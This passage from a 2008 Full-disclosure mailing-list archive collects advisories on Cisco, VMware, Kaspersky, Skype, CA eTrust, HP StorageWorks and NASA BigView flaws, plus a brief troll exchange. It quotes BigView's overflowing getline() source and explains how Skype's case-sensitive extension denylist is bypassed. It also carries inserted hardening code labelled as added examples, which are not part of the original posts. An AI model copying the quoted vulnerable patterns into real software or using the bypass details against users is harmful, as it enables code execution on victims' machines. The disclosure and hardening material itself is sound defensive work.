releases are not vulnerable. Additionally, devices that do not have
Instant Messaging Inspection enabled are not vulnerable.

Note:  Instant Messaging Inspection is disabled by default.

Vulnerability Scan Denial of Service
+---

Cisco ASA and Cisco PIX devices are affected by a vulnerability
(port) scan denial of service vulnerability if the device is running
software versions prior to 7.2(3)2 on the 7.2.x release or 8.0(2)17
on the 8.0.x release. Cisco ASA and Cisco PIX devices running
software versions 7.0.x, 7.1.x, or 8.1.x are not vulnerable.

Control-plane Access Control List Vulnerability
+--

Cisco ASA and Cisco PIX devices are affected by a vulnerability if
the device is configured to use control-plane ACLs and if it is
running software versions prior to 8.0(3)9 on the 8.0.x release.
Devices running software versions 7.x or 8.1.x are not vulnerable.

Note:  Control-plane ACLs were first introduced in software version
8.0(2). The control-plane ACLs are not enabled by default.

The show version command-line interface (CLI) command can be used to
determine if a vulnerable version of the Cisco PIX or Cisco ASA
software is running. The following example shows a Cisco ASA Security
Appliance that runs software release 8.0(2):

ASA# show version

Cisco Adaptive Security Appliance Software Version 8.0(2)
Device Manager Version 6.0(1)

[...]

Customers who use the Cisco Adaptive Security Device Manager (ASDM)
to manage their devices can find the version of the software
displayed in the table in the login window or in the upper left
corner of the ASDM window.

Products Confirmed Not Vulnerable
+

The Cisco Firewall Services Module (FWSM) is not affected by

[Full-disclosure] VMSA-2008-0009 Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues

2008-06-04 Thread VMware Security team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

- ---
   VMware Security Advisory

Advisory ID:   VMSA-2008-0009
Synopsis:  Updates to VMware Workstation, VMware Player,
   VMware ACE, VMware Fusion, VMware Server, VMware
   VIX API, VMware ESX, VMware ESXi resolve critical
   security issues
Issue date:2008-06-04
Updated on:2008-06-04 (initial release of advisory)
CVE numbers:   CVE-2007-5671 CVE-2008-0967 CVE-2008-2097
   CVE-2008-2100 CVE-2006-1721 CVE-2008-0553
   CVE-2007-5378 CVE-2007-4772 CVE-2008-0888
   CVE-2008-0062 CVE-2008-0063 CVE-2008-0948
- ---

1. Summary:

   Several critical security vulnerabilities have been addressed
   in patches in ESX and in the newest releases of VMware's hosted
   product line.

2. Relevant releases:

   VMware Workstation 6.0.3 and earlier,
   VMware Workstation 5.5.6 and earlier,
   VMware Player 2.0.3 and earlier,
   VMware Player 1.0.6 and earlier,
   VMware ACE 2.0.3 and earlier,
   VMware ACE 1.0.5 and earlier,
   VMware Server 1.0.5 and earlier,
   VMware Fusion 1.1.1 and earlier

   VMware ESXi 3.5  without patches ESXe350-200805501-I-SG,
ESXe350-200805502-T-SG,
ESXe350-200805503-C-SG

   VMware ESX 3.5   without patches ESX350-200805515-SG, ESX350-200805508-SG,
ESX350-200805501-BG, ESX350-200805504-SG,
ESX350-200805506-SG, ESX350-200805505-SG,
ESX350-200805507-SG

   VMware ESX 3.0.2 without patches ESX-1004727, ESX-1004821, ESX-1004216,
ESX-1004726, ESX-1004722, ESX-1004724,
ESX-1004719, ESX-1004219

   VMware ESX 3.0.1 without patches ESX-1004186, ESX-1004728, ESX-1004725,
ESX-1004721, ESX-1004723, ESX-1004190,
ESX-1004189

   VMware ESX 2.5.5 without update patch 8
   VMware ESX 2.5.4 without update patch 19

NOTES: Hosted products VMware Workstation 5.x, VMware Player 1.x,
   and VMware ACE 1.x will reach end of general support
   2008-11-09. Customers should plan to upgrade to the latest
   version of their respective products.

   ESX 3.0.1 is in Extended Support and its end of extended
   support (Security and Bug fixes) is 2008-07-31. Users should plan
   to upgrade to at least 3.0.2 update 1 and preferably the newest
   release available before the end of extended support.

   ESX 2.5.4 is in Extended Support and its end of extended support
   (Security and Bug fixes) is 2008-10-08.  Users should plan to upgrade
   to at least 2.5.5 and preferably the newest release available before
   the end of extended support.

3. Problem description:

 a. VMware Tools Local Privilege Escalation on Windows-based guest OS

The VMware Tools Package provides support required for shared folders
(HGFS) and other features.

An input validation error is present in the Windows-based VMware
HGFS.sys driver. Exploitation of this flaw might result in
arbitrary code execution on the guest system by an unprivileged
guest user. It doesn't matter on what host the Windows guest OS
is running, as this is a guest driver vulnerability and not a
vulnerability on the host.

The HGFS.sys driver is present in the guest operating system if the
VMware Tools package is loaded. Even if the host has HGFS disabled
and has no shared folders, Windows-based guests may be affected,
regardless of whether the host supports HGFS.

This issue could be mitigated by removing the VMware Tools package
from Windows-based guests. However, this is not recommended as it
would impact usability of the product.

NOTE: Installing the new hosted release or ESX patches will not
  remediate the issue.  The VMware Tools packages will need
  to be updated on each Windows-based guest followed by a
  reboot of the guest system.

VMware would like to thank iDefense and Stephen Fewer of Harmony
Security for reporting this issue to us.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2007-5671 to this issue.

VMware        Product   Running  Replace with/
Product       Version   on       Apply Patch
============  ========  =======  ==========================
Workstation   6.x       Windows  not affected
Workstation   6.x       Linux    not affected
Workstation   5.x       Windows  5.5.6 build 80404 or later
Workstation   5.x       Linux    5.5.6 build 80404 or later

Player        2.x       Windows  not affected
Play

[Full-disclosure] iDefense Security Advisory 06.04.08: Kaspersky Internet Security IOCTL Stack Based Buffer Overflow Vulnerability

2008-06-04 Thread iDefense Labs
iDefense Security Advisory 06.04.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 04, 2008

I. BACKGROUND

Kaspersky Internet Security Suite is a combination of Kaspersky
anti-virus, anti-spam, and personal firewall in one product. For more
information see the vendor's website at the following URL.

http://www.kaspersky.com/

II. DESCRIPTION

Local exploitation of a stack-based buffer overflow in Kaspersky Lab's
Internet Security could allow an attacker to execute arbitrary code in
the context of the kernel.

The kl1.sys kernel driver distributed with Internet Security contains a
stack-based buffer overflow in the handling of IOCTL 0x800520e8. This
issue is caused by a failure to properly perform bounds checks on
user-supplied data that is passed to the swprintf function as a source
buffer. The destination buffer in this case is a 2,000 element
wide-character array. If the source buffer exceeds 2,000 characters, a
buffer overflow will occur leading to the execution of arbitrary code.
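An added example, not code from Kaspersky Lab or iDefense, of the check the
kl1.sys handler lacks, modelled in user-mode C: the caller-supplied IOCTL
buffer is validated for size and termination before anything is formatted
into the 2,000-element wide-character array. The status codes and function
names are assumptions. The advisory does not say which swprintf variant the
driver called; the legacy Windows CRT swprintf has no size parameter, which
is consistent with the overflow described, so the pre-check is the guard. The
example uses the sized C99 swprintf for the copy itself.

```c
#include <stddef.h>
#include <stdlib.h>
#include <wchar.h>

#define DEST_ELEMS 2000                 /* the 2,000-element wide-char array */
#define STATUS_SUCCESS            0     /* assumed status codes, not the driver's */
#define STATUS_INVALID_PARAMETER  1
#define STATUS_BUFFER_TOO_SMALL   2

/* Length of a wide string, never reading past max_elems elements. */
static size_t bounded_wlen(const wchar_t *s, size_t max_elems) {
    size_t n = 0;
    while (n < max_elems && s[n] != L'\0') n++;
    return n;
}

/* Validate the IOCTL input buffer before it reaches any formatting call:
 * a whole number of wchar_t, a terminator inside the buffer, and a length
 * that leaves room for the terminator in DEST_ELEMS. This is the check the
 * vulnerable handler did not perform. */
int check_ioctl_input(const void *in_buf, size_t in_len, size_t *out_chars) {
    if (in_buf == NULL || in_len == 0 || in_len % sizeof(wchar_t) != 0)
        return STATUS_INVALID_PARAMETER;
    size_t max_elems = in_len / sizeof(wchar_t);
    size_t n = bounded_wlen((const wchar_t *)in_buf, max_elems);
    if (n == max_elems) return STATUS_INVALID_PARAMETER;  /* no terminator in buffer */
    if (n >= DEST_ELEMS) return STATUS_BUFFER_TOO_SMALL;  /* would overflow dest */
    *out_chars = n;
    return STATUS_SUCCESS;
}

/* Hardened handler: validate first, then format with the sized swprintf so
 * the 2,000-element stack buffer can never be overrun. */
int handle_ioctl_hardened(const void *in_buf, size_t in_len) {
    wchar_t dest[DEST_ELEMS];
    size_t n;
    int st = check_ioctl_input(in_buf, in_len, &n);
    if (st != STATUS_SUCCESS) return st;
    int written = swprintf(dest, DEST_ELEMS, L"%ls", (const wchar_t *)in_buf);
    if (written < 0 || (size_t)written != n) return STATUS_INVALID_PARAMETER;
    return STATUS_SUCCESS;
}

/* Constructed test input: `chars` wide characters, NUL-terminated or not. */
int ioctl_case(size_t chars, int terminated) {
    size_t elems = chars + (terminated ? 1 : 0);
    wchar_t *buf = malloc(elems * sizeof(wchar_t));
    if (buf == NULL) return -1;
    for (size_t i = 0; i < chars; i++) buf[i] = L'A';
    if (terminated) buf[chars] = L'\0';
    int st = handle_ioctl_hardened(buf, elems * sizeof(wchar_t));
    free(buf);
    return st;
}
```

A 1,999-character string is the longest input the handler accepts; 2,000
characters, an unterminated buffer, or a byte count that is not a multiple of
sizeof(wchar_t) are all refused before the stack buffer is touched.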

III. ANALYSIS

Exploitation of this issue allows an attacker to execute arbitrary code
within the kernel. An attacker would need local access to a vulnerable
computer to exploit this vulnerability.

IV. DETECTION

Kaspersky Lab's Internet Security version 7.0.1.325 is confirmed to be
vulnerable to this issue. Previous versions are also suspected to be
vulnerable.

V. WORKAROUND

iDefense is unaware of any workaround for this issue.

VI. VENDOR RESPONSE

Kaspersky Lab has addressed this vulnerability by releasing updated
anti-virus definition databases. For more information, refer to their
article at the following URL.

http://www.kaspersky.com/technews?id=203038727

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-1518 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/19/2008  Initial vendor notification
03/20/2008  Initial vendor response
06/04/2008  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Tobias Klein.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] iDefense Security Advisory 06.04.08: Skype File URI Security Bypass Code Execution Vulnerability

2008-06-04 Thread iDefense Labs
iDefense Security Advisory 06.04.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 04, 2008

I. BACKGROUND

Skype is a freely available VOIP client that allows access to chat and
video conference with other Skype users and traditional telephone
numbers. More information is available at the vendor's site at the
following URL.

http://www.skype.com/

II. DESCRIPTION

Remote exploitation of a security policy bypass in Skype could allow an
attacker to execute arbitrary code in the context of the user.

The "file:" URI handler in Skype performs checks upon the URL to verify
that the link does not contain certain file extensions related to
executable file formats. If the link is found to contain a blacklisted
file extension, a security warning dialog is shown to the user. The
following file extensions are checked and considered dangerous by
Skype; .ade, .adp, .asd, .bas, .bat, .cab, .chm, .cmd, .com, .cpl,
.crt, .dll, .eml, .exe, .hlp, .hta, .inf, .ins, .isp, .js.

Due to improper logic when performing these checks, it is possible to
bypass the security warning and execute the program. First of all,
checking is performed using a case sensitive comparison. The second
flaw in this check is that the blacklist fails to mention all potential
executable file formats. By using at least one upper case character, or
using an executable file type that is not covered in the list, an
attacker can bypass the security warning.
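An added example, not Skype's code, of the two flaws described above and the
fixes for each, in C. warn_vulnerable() models a case-sensitive substring
test over the URI against the 20 listed extensions. warn_case_insensitive()
fixes the first flaw by matching the real extension of the last path segment
after lower-casing it. warn_default_deny() addresses the second flaw: because
no denylist can enumerate every executable type (.scr, .pif and .vbs are
examples absent from Skype's list), it warns for anything not on a short
allowlist of document types. The allowlist and the function names are
assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* The 20 extensions Skype's handler checked, as listed in the advisory. */
static const char *const skype_blacklist[] = {
    ".ade", ".adp", ".asd", ".bas", ".bat", ".cab", ".chm", ".cmd", ".com", ".cpl",
    ".crt", ".dll", ".eml", ".exe", ".hlp", ".hta", ".inf", ".ins", ".isp", ".js"
};
#define N_BLACKLIST (sizeof skype_blacklist / sizeof skype_blacklist[0])

/* Flaw 1 modelled: case-sensitive substring match anywhere in the URI.
 * Returns 1 if the warning dialog would be shown. */
int warn_vulnerable(const char *uri) {
    for (size_t i = 0; i < N_BLACKLIST; i++)
        if (strstr(uri, skype_blacklist[i]) != NULL) return 1;
    return 0;
}

/* Lower-cased extension (including the dot) of the last path segment of a
 * file: URI, ignoring any ?query or #fragment. ext is "" if none or too long. */
static void path_extension(const char *uri, char *ext, size_t ext_sz) {
    const char *end = uri + strcspn(uri, "?#");
    const char *p = end;
    ext[0] = '\0';
    while (p > uri) {
        --p;
        if (*p == '/' || *p == '\\') return;        /* reached the directory part */
        if (*p == '.') {
            size_t n = (size_t)(end - p);            /* length including the dot */
            if (n >= ext_sz) return;
            for (size_t i = 0; i < n; i++)
                ext[i] = (char)tolower((unsigned char)p[i]);
            ext[n] = '\0';
            return;
        }
    }
}

/* Fix for flaw 1: exact, case-insensitive match on the actual extension. */
int warn_case_insensitive(const char *uri) {
    char ext[16];
    path_extension(uri, ext, sizeof ext);
    for (size_t i = 0; i < N_BLACKLIST; i++)
        if (strcmp(ext, skype_blacklist[i]) == 0) return 1;
    return 0;
}

/* Fix for flaw 2: invert the policy. Assumed allowlist of non-executable
 * document types; everything else, including no extension, gets the warning. */
static const char *const doc_allowlist[] = { ".txt", ".pdf", ".jpg", ".png", ".gif" };

int warn_default_deny(const char *uri) {
    char ext[16];
    path_extension(uri, ext, sizeof ext);
    for (size_t i = 0; i < sizeof doc_allowlist / sizeof doc_allowlist[0]; i++)
        if (strcmp(ext, doc_allowlist[i]) == 0) return 0;
    return 1;
}
```

With "setup.EXE" the substring check is bypassed while the normalised check
warns; with "run.scr" both denylist checks are bypassed, and only the
default-deny policy warns.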

III. ANALYSIS

Exploitation of this issue allows an attacker to execute arbitrary code
on the targeted user's machine. An attacker would need to persuade a
targeted user to click a "file:" URI pointing to a malicious
executable.

IV. DETECTION

iDefense confirmed version 3.6.0.248 of Skype to be vulnerable. Previous
versions are also suspected to be vulnerable.

V. WORKAROUND

iDefense is currently unaware of any effective workaround for this
issue.

VI. VENDOR RESPONSE

Skype has addressed this vulnerability by releasing version 3.8.0.139.
For more information consult their advisory at the following URL.

http://www.skype.com/security/skype-sb-2008-003.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-1805 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/16/2008  Initial vendor notification
05/17/2008  Initial vendor response
06/04/2008  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Ismael Briones
(Inkatel.com).




[Full-disclosure] ZDI-08-035: CA ETrust Secure Content Manager Gateway FTP PASV Stack Overflow Vulnerability

2008-06-04 Thread zdi-disclosures
ZDI-08-035: CA ETrust Secure Content Manager Gateway FTP PASV Stack 
Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-035
June 4, 2008

-- CVE ID:
CVE-2008-2541

-- Affected Vendors:
Computer Associates

-- Affected Products:
Computer Associates eTrust Secure Content Manager

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6168. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Computer Associates eTrust Secure Content
Manager. Authentication is not required to exploit this vulnerability.

The specific flaw exists in the HTTP Gateway service icihttp.exe running
on port 8080. By specifying an overly long response to a PASV command a
stack buffer can be overflowed. Successful exploitation can lead to
complete system compromise under the SYSTEM context.
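The flaw above (and the LIST variant in ZDI-08-036) is an unbounded copy of a
server reply into a fixed stack buffer. As an added example, not CA's code, a
bounded parser for the FTP "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)"
reply that a gateway proxying FTP would need: the reply length and every
field are validated in place, so an overlong or malformed response from a
hostile FTP server is rejected rather than copied. PASV_MAX_REPLY and the
function names are assumptions.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define PASV_MAX_REPLY 128   /* assumed sane upper bound for one 227 reply line */

/* Parse a PASV reply from an untrusted server. Returns 0 and fills ip/port on
 * success, -1 on any length or syntax violation. The reply is scanned against
 * reply_len and never copied into a fixed-size buffer. */
int parse_pasv_reply(const char *reply, size_t reply_len,
                     unsigned char ip[4], unsigned *port) {
    if (reply == NULL || reply_len < 3 || reply_len > PASV_MAX_REPLY) return -1;
    if (memcmp(reply, "227", 3) != 0) return -1;
    const char *end = reply + reply_len;
    const char *p = memchr(reply, '(', reply_len);
    if (p == NULL) return -1;
    p++;
    unsigned v[6];
    for (int i = 0; i < 6; i++) {
        unsigned n = 0, digits = 0;
        while (p < end && *p >= '0' && *p <= '9') {
            n = n * 10 + (unsigned)(*p - '0');
            if (n > 255) return -1;              /* every field is one octet */
            p++; digits++;
        }
        if (digits == 0 || digits > 3) return -1;
        v[i] = n;
        if (i < 5) {
            if (p >= end || *p != ',') return -1;
            p++;
        }
    }
    if (p >= end || *p != ')') return -1;
    for (int i = 0; i < 4; i++) ip[i] = (unsigned char)v[i];
    *port = v[4] * 256 + v[5];
    return 0;
}

/* Returns the data port from a NUL-terminated reply, or 0 if it was rejected. */
unsigned pasv_port(const char *reply) {
    unsigned char ip[4];
    unsigned port;
    if (parse_pasv_reply(reply, strlen(reply), ip, &port) != 0) return 0;
    return port;
}

/* Constructed reply padded with `pad` spaces between the code and the text,
 * to show that an overlong line is refused before any field is read. */
int pasv_with_padding(size_t pad) {
    const char *head = "227 ";
    const char *tail = "Entering Passive Mode (192,168,0,10,4,1)\r\n";
    size_t hl = strlen(head), tl = strlen(tail), len = hl + pad + tl;
    char *buf = malloc(len + 1);
    if (buf == NULL) return -1;
    memcpy(buf, head, hl);
    memset(buf + hl, ' ', pad);
    memcpy(buf + hl + pad, tail, tl + 1);
    unsigned char ip[4];
    unsigned port;
    int rc = parse_pasv_reply(buf, len, ip, &port);
    free(buf);
    return rc;
}
```

Port 4,210 in a reply decodes to 4*256+210 = 1234; a field above 255, a
missing bracket, or a line longer than PASV_MAX_REPLY is rejected.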

-- Vendor Response:
Computer Associates has issued an update to correct this vulnerability.
More details can be found at:

https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177784

-- Disclosure Timeline:
2008-05-23 - Vulnerability reported to vendor
2008-06-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt ([EMAIL PROTECTED])

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 


[Full-disclosure] ZDI-08-036: CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow

2008-06-04 Thread zdi-disclosures
ZDI-08-036: CA ETrust Secure Content Manager Gateway FTP LIST Stack 
Overflow
http://www.zerodayinitiative.com/advisories/ZDI-08-036
June 4, 2008

-- CVE ID:
CVE-2008-2541

-- Affected Vendors:
Computer Associates

-- Affected Products:
Computer Associates eTrust Secure Content Manager

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Computer Associates eTrust Secure Content
Manager. Authentication is not required to exploit this vulnerability.

The specific flaw exists in the HTTP Gateway service icihttp.exe running
on port 8080. When issuing a request for an FTP service the process tries
to decorate the contents of the transaction. In this particular case, by
specifying an overly long response to a LIST command a stack buffer can
be overflowed. Successful exploitation can lead to complete system
compromise under the SYSTEM context.

-- Vendor Response:
Computer Associates has issued an update to correct this vulnerability.
More details can be found at:

https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177784

-- Disclosure Timeline:
2008-05-23 - Vulnerability reported to vendor
2008-06-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt ([EMAIL PROTECTED])



[Full-disclosure] ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing Stack Overflow Vulnerability

2008-06-04 Thread zdi-disclosures
ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing 
Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-034
June 4, 2008

-- CVE ID:
CVE-2008-1661

-- Affected Vendors:
Hewlett-Packard

-- Affected Products:
Hewlett-Packard StorageWorks

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6051. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Hewlett Packard StorageWorks Storage
Mirroring. Authentication is not required to exploit this
vulnerability.

The specific flaw exists in the DoubleTake.exe process bound by default
on TCP ports 1100, 1106 and UDP port 1105. During the handling of an
encoded authentication request, the process copies the user-supplied
login information into a fixed length stack buffer. Sending at least 256
bytes will trigger a stack based buffer overflow due to a vulnerable
processing loop. Exploitation of this issue can result in arbitrary code
execution.

-- Vendor Response:
Hewlett-Packard states:
To resolve this vulnerability download HP StorageWorks Storage Mirroring
software v4.5 Service Pack 2 (SP2) from Double-Take at the following
URL: http://www.doubletake.com/products/double-take/default.aspx

-- Disclosure Timeline:
2007-05-22 - Vulnerability reported to vendor
2008-06-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Titon of BastardLabs



Re: [Full-disclosure] Fwd: Comments on: Phoenix Mars Lander site hacked

2008-06-04 Thread Giany


n3td3v <[EMAIL PROTECTED]> wrote:

The day Zone-H closes shop, the day I party like a mother fo!


The day you stop spamming, the day I'll be happy!


Re: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix Mars Lander site hacked

2008-06-04 Thread Bardiir
*sigh* I can't take it anymore...

1. Answering to Spam just makes it worse for the list. Flame the troll on
his mail-address if you feel like, but please take the mailing list out of
the recp. or at least mark the answer as offtopic.
2. Just block [EMAIL PROTECTED] and everything is well...
3. Just let the troll have its fun; eventually it will get bored someday
and stop spamming.
4. Don't feed the trolls.

Thanks

On Wed, Jun 4, 2008 at 8:15 PM, Giany <[EMAIL PROTECTED]> wrote:

>
>
> *n3td3v <[EMAIL PROTECTED]>* wrote:
>
>
> The day Zone-H closes shop, the day I party like a mother fo!
>
>
> The day you stop spamming, the day I`ll be happy!
>
>
>

Re: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix Mars Lander site hacked

2008-06-04 Thread n3td3v
On Wed, Jun 4, 2008 at 7:46 PM, Bardiir <[EMAIL PROTECTED]> wrote:
> *sigh* I can't take it anymore...
>
> 1. Answering to Spam just makes it worse for the list. Flame the troll on
> his mail-address if you feel like, but please take the mailing list out of
> the recp. or at least mark the answer as offtopic.
> 2. Just block [EMAIL PROTECTED] and everything is well...
> 3. Just let the troll have it's fun, eventually it will get bored someday
> and stop spamming.
> 4. Don't feed the trolls.
>
> Thanks

I'm not a troll, I'm a serious security researcher.

I was misrepresented in the media by SecurityFocus' Robert Lemos, who
ruined my image.

The findings have been posted:

http://smear-campaign-against-n3td3v.blogspot.com/2007/12/smear-campaign-against-n3td3v.html

All the best,

n3td3v



[Full-disclosure] CORE-2008-0425 - NASA BigView Stack Buffer Overflow

2008-06-04 Thread CORE Security Technologies Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

  Core Security Technologies - CoreLabs Advisory
  http://www.coresecurity.com/corelabs/

   NASA BigView Stack Buffer Overflow


*Advisory Information*

Title: NASA BigView Stack Buffer Overflow
Advisory ID: CORE-2008-0425
Advisory URL: http://www.coresecurity.com/?action=item&id=2304
Date published: 2008-06-04
Date of last update: 2008-06-03
Vendors contacted: NASA Ames Research Center
Release mode: Coordinated release


*Vulnerability Information*

Class: Stack Overflow
Remotely Exploitable: Yes (client side)
Locally Exploitable: No
Bugtraq ID: 29517   
CVE Name: CVE-2008-2542 


*Vulnerability Description*

NASA BigView [1] allows for interactive panning and zooming of images of
arbitrary size on desktop PCs running Linux. Using this software, one
can explore (on relatively modest machines) images such as the Mars
Orbiter Camera mosaic [92160x33280 pixels].

The BigView package suffers from a stack buffer overflow when parsing
specially crafted (invalid) PNM input files. If successful, a malicious
third party could trigger execution of arbitrary code within the context
of the application, or otherwise crash the whole application. The
vulnerability is caused by the BigView package not checking the line
length of ASCII PNM input files before copying a line into a stack
buffer. This can be exploited to get arbitrary code execution by
opening a specially crafted file.

Exploitation of the PNM overflow problem requires the user to explicitly
open a malicious file. The user should refrain from opening files from
untrusted third parties or accessing untrusted Web sites until the patch
is applied.


*Vulnerable Packages*

. BigView revision 1.8.
. Older BigView versions could be affected too, but they were not tested.


*Non-vulnerable Packages*

. Available through BigView website (since June 2nd 2008, see below).


*Vendor Information, Solutions and Workarounds*

The NASA BigView team has published a new version fixing this
vulnerability. The tarball is available on BigView's website:
http://opensource.arc.nasa.gov/project/bigview/


*Credits*

This vulnerability was discovered and researched by Alfredo Ortega, from
CORE IMPACT's Exploit Writing Team (EWT), Core Security Technologies.


*Technical Description / Proof of Concept Code*

The BigView package suffers from a stack buffer overflow when parsing
specially crafted (invalid) PNM input files. If successful, a malicious
third party could trigger execution of arbitrary code within the context
of the application, or otherwise crash the whole application.

The vulnerability resides in the following code at 'Ppm/ppm.C'. Here,
the function 'getline()' reads data from a file into a buffer. This is
the complete function:

/---

418 static void getline(int fin, char* lineBuf, int len)
419 {
420   bool done=false;
421   int index=0;
422   lineBuf[index]=' ';
423   while(! done){
424 lineBuf[index] = getOneChar(fin);
425 if( lineBuf[index]==10 ) {
426   lineBuf[index]=0;
427   done=true;
428 }
429 ++index;
430   }
431   lineBuf[index]=0;
432 }

- ---/

Clearly the function takes the length of the destination buffer as a
parameter, but it is never used internally. This function is called
from 'PPM::ppmHeader()' to read the header of the PPM file.
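An added example, not NASA's code, of what a bounded getline() for this
reader should do: honour len, NUL-terminate in every path, stop at end of
input instead of looping, and report an overlong line (draining it so the
caller stays line-aligned) rather than writing past lineBuf. The in-memory
reader standing in for getOneChar()'s descriptor, the return-code convention
and the canary test are assumptions of this example.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Constructed in-memory stand-in for the descriptor read by getOneChar();
 * returns the next byte or -1 at end of input. */
typedef struct { const char *data; size_t len; size_t pos; } mem_reader;

static int mem_getc(mem_reader *r) {
    if (r->pos >= r->len) return -1;
    return (unsigned char)r->data[r->pos++];
}

/* Bounded replacement for getline(). Returns the number of bytes stored,
 * -1 at end of input with nothing read, -2 if the line did not fit in len. */
int getline_bounded(mem_reader *fin, char *lineBuf, size_t len) {
    size_t index = 0;
    if (len == 0) return -2;
    for (;;) {
        int c = mem_getc(fin);
        if (c < 0) {                               /* EOF: original looped forever */
            lineBuf[index] = '\0';
            return index == 0 ? -1 : (int)index;
        }
        if (c == '\n') {
            lineBuf[index] = '\0';
            return (int)index;
        }
        if (index + 1 >= len) {                    /* no room for c and the NUL */
            lineBuf[index] = '\0';
            while ((c = mem_getc(fin)) >= 0 && c != '\n') { }   /* drain the line */
            return -2;
        }
        lineBuf[index++] = (char)c;
    }
}

/* Walk every line of a buffer with the same 512-byte lineBuf ppmHeader() uses.
 * Returns the line count, or -2 as soon as one line is overlong. */
int scan_lines(const char *data, size_t n) {
    mem_reader r = { data, n, 0 };
    char lineBuf[512];
    int count = 0, rc;
    while ((rc = getline_bounded(&r, lineBuf, sizeof lineBuf)) != -1) {
        if (rc == -2) return -2;
        count++;
    }
    return count;
}

/* Feed a line of line_len 'A's with no newline into a 512-byte buffer that is
 * immediately followed by a canary. Returns 1 only if the line was rejected
 * and the canary is intact, i.e. nothing was written past the buffer. */
int overlong_line_contained(size_t line_len) {
    struct { char buf[512]; char canary[8]; } s;
    char *line = malloc(line_len);
    if (line == NULL) return 0;
    memset(line, 'A', line_len);
    memcpy(s.canary, "CANARY!", 8);
    mem_reader r = { line, line_len, 0 };
    int rc = getline_bounded(&r, s.buf, sizeof s.buf);
    int ok = (rc == -2) && memcmp(s.canary, "CANARY!", 8) == 0;
    free(line);
    return ok;
}
```

A 511-byte line is the longest that fits a 512-byte buffer with its
terminator; 512 bytes or more is reported as overlong, and a PNM header with
three short lines counts as three.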

/---

56  PPM::ppmHeader(string filename, PPM::Format* format,
57 int* cpp, int* bpc,
58 int* sizeX, int* sizeY,
59 int* imageOffset)
60  {
61std::ostringstream err;
62char magic[3],lineBuf[512],junk;
